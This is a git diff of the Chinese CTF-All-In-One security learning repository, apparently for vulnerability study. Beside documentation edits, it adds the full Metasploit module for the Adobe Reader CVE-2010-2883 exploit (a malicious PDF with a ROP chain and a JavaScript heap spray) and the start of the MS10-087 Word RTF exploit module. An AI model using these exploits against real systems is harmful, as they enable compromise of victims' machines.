diff --git a/SUMMARY.md b/SUMMARY.md index 9ef3bdd..c5b1b2e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -59,6 +59,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [2.4.4 binwalk](doc/2.4.4_binwalk.md) * [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md) * [2.4.6 Wireshark](doc/2.4.6_wireshark.md) + * [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md) * [三、分类专题篇](doc/3_topics.md) * Pwn * [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md) @@ -156,10 +157,11 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * Reverse * [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md) * [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md) - * [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md) + * [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md) * [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md) - * [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md) + * [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md) + * [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md) * Web * [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md) * Crypto @@ -175,7 +177,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md) * [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md) * [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md) - * [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md) + * [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md) * Malware * [八、学术篇](doc/8_academic.md) * [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md) 
diff --git a/doc/2.3.2_ollydbg.md b/doc/2.3.2_ollydbg.md index f77eec8..75ea1fa 100644 --- a/doc/2.3.2_ollydbg.md +++ b/doc/2.3.2_ollydbg.md @@ -1,10 +1,21 @@ # 2.3.2 OllyDbg 调试器 - [快捷键](#快捷键) +- [命令行插件](#命令行插件) - [参考资料](#参考资料) ## 快捷键 +- F2:在光标选定位置按 F2 键设置或取消断点。 +- F4:运行到光标选定位置处暂停。 +- F7:单步步入:每次执行一条指令,遇到 call 等子程序时进入其中。 +- F8:单步步过,每次执行一条指令,遇到 call 等子程序时不进入其中。 +- F9:运行,被调试软件继续运行,直到遇到下一个断点。 +- Ctrl+F9:执行到返回,在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。 +- Alt+F9:执行到用户代码,可用于从系统部分快速返回到被调试程序部分。 + + +## 命令行插件 ## 参考资料 - http://www.ollydbg.de/ diff --git a/doc/2.4.7_cuckoo.md b/doc/2.4.7_cuckoo.md new file mode 100644 index 0000000..c663bc6 --- /dev/null +++ b/doc/2.4.7_cuckoo.md @@ -0,0 +1,13 @@ +# 2.4.7 Cuckoo Sandbox + +- [简介](#简介) +- [安装](#安装) +- [参考资料](#参考资料) + + +## 简介 + +## 安装 + +## 参考资料 +- https://cuckoosandbox.org/ diff --git a/doc/2_tools.md b/doc/2_tools.md index 968a039..490269d 100644 --- a/doc/2_tools.md +++ b/doc/2_tools.md @@ -24,3 +24,4 @@ * [2.4.4 binwalk](2.4.4_binwalk.md) * [2.4.5 Burp Suite](2.4.5_burpsuite.md) * [2.4.6 Wireshark](2.4.6_wireshark.md) + * [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md) diff --git a/doc/5.8.1_z3.md b/doc/5.8.1_z3.md index 14f8dd3..cb88fbe 100644 --- a/doc/5.8.1_z3.md +++ b/doc/5.8.1_z3.md @@ -23,7 +23,6 @@ ``` $ git clone https://github.com/Z3Prover/z3.git $ cd z3 - $ python scripts/mk_make.py --python $ cd build $ make diff --git a/doc/5.8_sat-smt.md b/doc/5.8_sat-smt.md index d3177f4..99da957 100644 --- a/doc/5.8_sat-smt.md +++ b/doc/5.8_sat-smt.md @@ -2,5 +2,7 @@ - [参考资料](#参考资料) + ## 参考资料 - [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf) +- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution) 
diff --git a/doc/6.2.3_re_codegate2017_angrybird.md b/doc/6.2.3_re_codegatectf2017_angrybird.md similarity index 99% rename from doc/6.2.3_re_codegate2017_angrybird.md rename to doc/6.2.3_re_codegatectf2017_angrybird.md index 2fd291e..746f47d 100644 --- a/doc/6.2.3_re_codegate2017_angrybird.md +++ b/doc/6.2.3_re_codegatectf2017_angrybird.md @@ -1,10 +1,10 @@ -# 6.2.3 re Codegate2017 angrybird +# 6.2.3 re CodegateCTF2017 angrybird - [题目解析](#题目解析) - [参考资料](#参考资料) -[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird) +[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird) ## 题目解析 看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。 @@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:) ## 参考资料 +- https://ctftime.org/task/3375 diff --git a/doc/6.2.6_re_seccon2017_printf_machine.md b/doc/6.2.6_re_secconctf2017_printf_machine.md similarity index 76% rename from doc/6.2.6_re_seccon2017_printf_machine.md rename to doc/6.2.6_re_secconctf2017_printf_machine.md index 2a9c2b2..2d159bd 100644 --- a/doc/6.2.6_re_seccon2017_printf_machine.md +++ b/doc/6.2.6_re_secconctf2017_printf_machine.md @@ -1,10 +1,10 @@ -# 6.2.6 re SECCON2017 printf_machine +# 6.2.6 re SECCONCTF2017 printf_machine - [题目解析](#题目解析) - [参考资料](#参考资料) -[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine) +[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine) ## 题目解析 ``` @@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l ## 参考资料 +- https://ctftime.org/task/5042 - [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine) diff --git a/doc/6.2.7_re_codegatectf2018_redvelvet.md b/doc/6.2.7_re_codegatectf2018_redvelvet.md new file mode 100644 index 0000000..0857a0e --- /dev/null +++ b/doc/6.2.7_re_codegatectf2018_redvelvet.md 
@@ -0,0 +1,17 @@ +# 6.2.7 re CodegateCTF2018 RedVelvet + +- [题目解析](#题目解析) +- [参考资料](#参考资料) + + +[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet) + +## 题目解析 +``` +$ file RedVelvet +RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped +``` + + +## 参考资料 +- https://ctftime.org/task/5231 diff --git a/doc/6.3.1_web_hctf2017_babycrack.md b/doc/6.3.1_web_hctf2017_babycrack.md index 42fe31b..ae8a1ff 100644 --- a/doc/6.3.1_web_hctf2017_babycrack.md +++ b/doc/6.3.1_web_hctf2017_babycrack.md @@ -4,6 +4,8 @@ - [解题流程](#解题流程) +[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack) + ## 题目解析 题目就不用多说了,很容易发现是 JavaScript 代码审计。 diff --git a/doc/6_writeup.md b/doc/6_writeup.md index 292708c..6a5e5df 100644 --- a/doc/6_writeup.md +++ b/doc/6_writeup.md @@ -32,10 +32,11 @@ * Reverse * [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md) * [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md) - * [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md) + * [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md) * [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md) - * [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md) + * [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md) + * [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md) * Web * [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md) * Crypto diff --git a/doc/7.1.8_adobe_reader_2010-2883.md b/doc/7.1.8_adobe_reader_2010-2883.md index 8ba5186..1684422 100644 --- a/doc/7.1.8_adobe_reader_2010-2883.md +++ b/doc/7.1.8_adobe_reader_2010-2883.md 
@@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的 | --- | --- | --- | | 操作系统 | Windows XP SP3 | 体系结构:32 位 | | 调试器 | OllyDbg | 版本号:吾爱专版 | +| 反汇编器 | IDA Pro | 版本号:6.8 | | 漏洞软件 | Adobe Reader | 版本号:9.3.4 | 我们利用 Metasploit 来生成攻击样本: diff --git a/doc/7.1.9_ms_word_2010-2333.md b/doc/7.1.9_ms_word_2010-2333.md deleted file mode 100644 index 36df6c8..0000000 --- a/doc/7.1.9_ms_word_2010-2333.md +++ /dev/null @@ -1,18 +0,0 @@ -# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞 - -- [漏洞描述](#漏洞描述) -- [漏洞复现](#漏洞复现) -- [漏洞分析](#漏洞分析) -- [参考资料](#参考资料) - - -[下载文件](../src/exploit/7.1.9_ms_word_2010-2333) - -## 漏洞描述 - -## 漏洞复现 - -## 漏洞分析 - -## 参考资料 -- https://www.cvedetails.com/cve/CVE-2010-2333 diff --git a/doc/7.1.9_ms_word_2010-3333.md b/doc/7.1.9_ms_word_2010-3333.md new file mode 100644 index 0000000..f1a3956 --- /dev/null +++ b/doc/7.1.9_ms_word_2010-3333.md @@ -0,0 +1,29 @@ +# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞 + +- [漏洞描述](#漏洞描述) +- [漏洞复现](#漏洞复现) +- [漏洞分析](#漏洞分析) +- [参考资料](#参考资料) + + +[下载文件](../src/exploit/7.1.9_ms_word_2010-3333) + +## 漏洞描述 +cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。 + + +## 漏洞复现 +| |推荐使用的环境 | 备注 | +| --- | --- | --- | +| 操作系统 | Windows XP SP3 | 体系结构:32 位 | +| 调试器 | OllyDbg | 版本号:吾爱专版 | +| 反汇编器 | IDA Pro | 版本号:7.0 | +| 漏洞软件 | MS Office | 版本号:2003 SP3 | + +我们利用 Metasploit 来生成攻击样本 + + +## 漏洞分析 + +## 参考资料 +- https://www.cvedetails.com/cve/CVE-2010-2333 diff --git a/doc/7_exploit.md b/doc/7_exploit.md index 1bc60cf..51133af 100644 --- a/doc/7_exploit.md +++ b/doc/7_exploit.md 
@@ -9,5 +9,5 @@ * [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md) * [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md) * [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md) - * [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md) + * [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md) * Malware diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb b/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb new file mode 100644 index 0000000..422e35c --- /dev/null +++ b/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb 
@@ -0,0 +1,562 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table + handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are + assumed to be vulnerable as well. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # 0day found in the wild + 'sn0wfl0w', # initial analysis, also @vicheck on twitter + 'jduck' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2010-2883' ], + [ 'OSVDB', '67849'], + [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ], + [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd + # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd + # Tested OK via Adobe Reader 9.3 on XP and 7 -todb + [ 'Automatic', { }], + ], + 'DisclosureDate' => 'Sep 07 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ]) + end + + def exploit + ttf_data = make_ttf() + + js_data = make_js(payload.encoded) + + # Create the pdf + pdf = make_pdf(ttf_data, js_data) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + 
file_create(pdf) + end + + def make_ttf + ttf_data = "" + + # load the static ttf file + + # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20) + path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" ) + fd = File.open( path, "rb" ) + ttf_data = fd.read(fd.stat.size) + fd.close + + # Build the SING table + sing = '' + sing << [ + 0, 1, # tableVersionMajor, tableVersionMinor (0.1) + 0xe01, # glyphletVersion + 0x100, # embeddingInfo + 0, # mainGID + 0, # unitsPerEm + 0, # vertAdvance + 0x3a00 # vertOrigin + ].pack('vvvvvvvv') + # uniqueName + # "The uniqueName string must be a string of at most 27 7-bit ASCII characters" + #sing << "A" * (0x254 - sing.length) + sing << rand_text(0x254 - sing.length) + + # 0xffffffff gets written here @ 0x7001400 (in BIB.dll) + sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V') + + # This becomes our new EIP (puts esp to stack buffer) + ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret + sing[0x208, 4] = [ret].pack('V') + + # This becomes the new eip after the first return + ret = 0x4a82a714 + sing[0x18, 4] = [ret].pack('V') + + # This becomes the new esp after the first return + esp = 0x0c0c0c0c + sing[0x1c, 4] = [esp].pack('V') + + # Without the following, sub_801ba57 returns 0. 
+ sing[0x24c, 4] = [0x6c].pack('V') + + ttf_data[0xec, 4] = "SING" + ttf_data[0x11c, sing.length] = sing + + ttf_data + end + + def make_js(encoded_payload) + + # The following executes a ret2lib using icucnv36.dll + # The effect is to bypass DEP and execute the shellcode in an indirect way + stack_data = [ + 0x41414141, # unused + 0x4a8063a5, # pop ecx / ret + 0x4a8a0000, # becomes ecx + + 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as + + 0x4a801f90, # pop eax / ret + 0x4a84903c, # becomes eax (import for CreateFileA) + + # -- call CreateFileA + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591") + 0x10000000, # second arg - dwDesiredAccess + 0x00000000, # third arg - dwShareMode + 0x00000000, # fourth arg - lpSecurityAttributes + 0x00000002, # fifth arg - dwCreationDisposition + 0x00000102, # sixth arg - dwFlagsAndAttributes + 0x00000000, # seventh arg - hTemplateFile + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000008, # becomes ebx - offset to modify + + # + # This points at a neat-o block of code that ... 
TBD + # + # and [esp+ebx*2],edi + # jne check_slash + # ret_one: + # mov al,1 + # ret + # check_slash: + # cmp al,0x2f + # je ret_one + # cmp al,0x41 + # jl check_lower + # cmp al,0x5a + # jle check_ptr + # check_lower: + # cmp al,0x61 + # jl ret_zero + # cmp al,0x7a + # jg ret_zero + # cmp [ecx+1],0x3a + # je ret_one + # ret_zero: + # xor al,al + # ret + # + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849038, # becomes eax (import for CreateFileMappingA) + + # -- call CreateFileMappingA + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0xffffffff, # arguments to CreateFileMappingA, hFile + 0x00000000, # lpAttributes + 0x00000040, # flProtect + 0x00000000, # dwMaximumSizeHigh + 0x00010000, # dwMaximumSizeLow + 0x00000000, # lpName + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000008, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849030, # becomes eax (import for MapViewOfFile + + # -- call MapViewOfFile + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0xffffffff, # args to MapViewOfFile - hFileMappingObject + 0x00000022, # dwDesiredAccess + 0x00000000, # dwFileOffsetHigh + 0x00000000, # dwFileOffsetLow + 0x00010000, # dwNumberOfBytesToMap + + 0x4a8063a5, # pop ecx / ret + 0x4a8a0004, # becomes ecx - writable pointer + + 0x4a802196, # mov [ecx],eax / ret - save map base addr + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000030, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a8a0004, # becomes eax - saved file mapping ptr + + 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 
0x00000020, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret + + 0x4a801f90, # pop eax / ret + 0x00000034, # becomes eax + + 0x4a80d585, # add eax,edx / ret + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x0000000a, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849170, # becomes eax (import for memcpy) + + # -- call memcpy + 0x4a80b692, # jmp [eax] + + 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy + 0xffffffff, # becomes first arg to memcpy (dst) + 0xffffffff, # becomes second arg to memcpy (src) + 0x00001000, # becomes third arg to memcpy (length) + #0x0000258b, # ?? + #0x4d4d4a8a, # ?? 
+ ].pack('V*') + + var_unescape = rand_text_alpha(rand(100) + 1) + var_shellcode = rand_text_alpha(rand(100) + 1) + + var_start = rand_text_alpha(rand(100) + 1) + + var_s = 0x10000 + var_c = rand_text_alpha(rand(100) + 1) + var_b = rand_text_alpha(rand(100) + 1) + var_d = rand_text_alpha(rand(100) + 1) + var_3 = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(100) + 1) + var_4 = rand_text_alpha(rand(100) + 1) + + payload_buf = '' + payload_buf << stack_data + payload_buf << encoded_payload + + escaped_payload = Rex::Text.to_unescape(payload_buf) + + js = %Q| +var #{var_unescape} = unescape; +var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); +var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); +while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; +#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); +#{var_b} += #{var_shellcode}; +#{var_b} += #{var_c}; +#{var_d} = #{var_b}.substring(0, #{var_s}/2); +while(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; +#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); +var #{var_4} = new Array(); +for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; +| + + js + end + + def random_non_ascii_string(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def io_def(id) + "%d 0 obj \n" % id + end + + def io_ref(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def n_obfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ascii_hex_whitespace_encode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(ttf, js) + + #swf_name = rand_text_alpha(8 
+ rand(8)) + ".swf" + + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << random_non_ascii_string(4) << eol + + # catalog + xref << pdf.length + pdf << io_def(1) << n_obfu("<<") << eol + pdf << n_obfu("/Pages ") << io_ref(2) << eol + pdf << n_obfu("/Type /Catalog") << eol + pdf << n_obfu("/OpenAction ") << io_ref(11) << eol + # The AcroForm is required to get icucnv36.dll to load + pdf << n_obfu("/AcroForm ") << io_ref(13) << eol + pdf << n_obfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << io_def(2) << n_obfu("<<") << eol + pdf << n_obfu("/MediaBox ") << io_ref(3) << eol + pdf << n_obfu("/Resources ") << io_ref(4) << eol + pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol + pdf << n_obfu("/Count 1") << eol + pdf << n_obfu("/Type /Pages") << eol + pdf << n_obfu(">>") << eol + pdf << endobj + + # media box + xref << pdf.length + pdf << io_def(3) + pdf << "[0 0 595 842]" << eol + pdf << endobj + + # resources + xref << pdf.length + pdf << io_def(4) + pdf << n_obfu("<<") << eol + pdf << n_obfu("/Font ") << io_ref(6) << eol + pdf << ">>" << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << io_def(5) << n_obfu("<<") << eol + pdf << n_obfu("/Parent ") << io_ref(2) << eol + pdf << n_obfu("/MediaBox ") << io_ref(3) << eol + pdf << n_obfu("/Resources ") << io_ref(4) << eol + pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol + pdf << n_obfu("/Type /Page") << eol + pdf << n_obfu(">>") << eol # end obj dict + pdf << endobj + + # font + xref << pdf.length + pdf << io_def(6) << n_obfu("<<") << eol + pdf << n_obfu("/F1 ") << io_ref(7) << eol + pdf << ">>" << eol + pdf << endobj + + # ttf object + xref << pdf.length + pdf << io_def(7) << n_obfu("<<") << eol + pdf << n_obfu("/Type /Font") << eol + pdf << n_obfu("/Subtype /TrueType") << eol + pdf << n_obfu("/Name /F1") << eol + pdf << n_obfu("/BaseFont /Cinema") << eol + pdf << n_obfu("/Widths []") << 
eol + pdf << n_obfu("/FontDescriptor ") << io_ref(9) + pdf << n_obfu("/Encoding /MacRomanEncoding") + pdf << n_obfu(">>") << eol + pdf << endobj + + # page content + content = "Hello World!" + content = "" + + "0 g" + eol + + "BT" + eol + + "/F1 32 Tf" + eol + + "32 Tc" + eol + + "1 0 0 1 32 773.872 Tm" + eol + + "(" + content + ") Tj" + eol + + "ET" + + xref << pdf.length + pdf << io_def(8) << "<<" << eol + pdf << n_obfu("/Length %s" % content.length) << eol + pdf << ">>" << eol + pdf << "stream" << eol + pdf << content << eol + pdf << "endstream" << eol + pdf << endobj + + # font descriptor + xref << pdf.length + pdf << io_def(9) << n_obfu("<<") + pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema") + pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17)) + pdf << n_obfu("/FontBBox [-177 -269 1123 866]") + pdf << n_obfu("/FontFile2 ") << io_ref(10) + pdf << n_obfu(">>") << eol + pdf << endobj + + # ttf stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ttf) + pdf << io_def(10) << n_obfu("<>" % [compressed.length, ttf.length]) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + # js action + xref << pdf.length + pdf << io_def(11) << n_obfu("<<") + pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12) + pdf << n_obfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js)) + pdf << io_def(12) << n_obfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll to load + ### + + # form object + xref << pdf.length + pdf << io_def(13) + pdf << n_obfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + +EOF + + xref << pdf.length + pdf << io_def(14) << n_obfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << 
eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << n_obfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end +end diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf b/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf new file mode 100755 index 0000000..58cd6b5 Binary files /dev/null and b/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf differ diff --git a/src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb b/src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb new file mode 100644 index 0000000..fe89051 --- /dev/null +++ b/src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb 
@@ -0,0 +1,199 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in the handling of the + 'pFragments' shape property within the Microsoft Word RTF parser. All versions + of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the + MS10-087 bulletin are vulnerable. + + This module does not attempt to exploit the vulnerability via Microsoft Outlook. + + The Microsoft Word RTF parser was only used by default in versions of Microsoft + Word itself prior to Office 2007. With the release of Office 2007, Microsoft + began using the Word RTF parser, by default, to handle rich-text messages within + Outlook as well. It was possible to configure Outlook 2003 and earlier to use + the Microsoft Word engine too, but it was not a default setting. + + It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that + Microsoft will confirm or deny this since Office 2000 has reached its support + cycle end-of-life. 
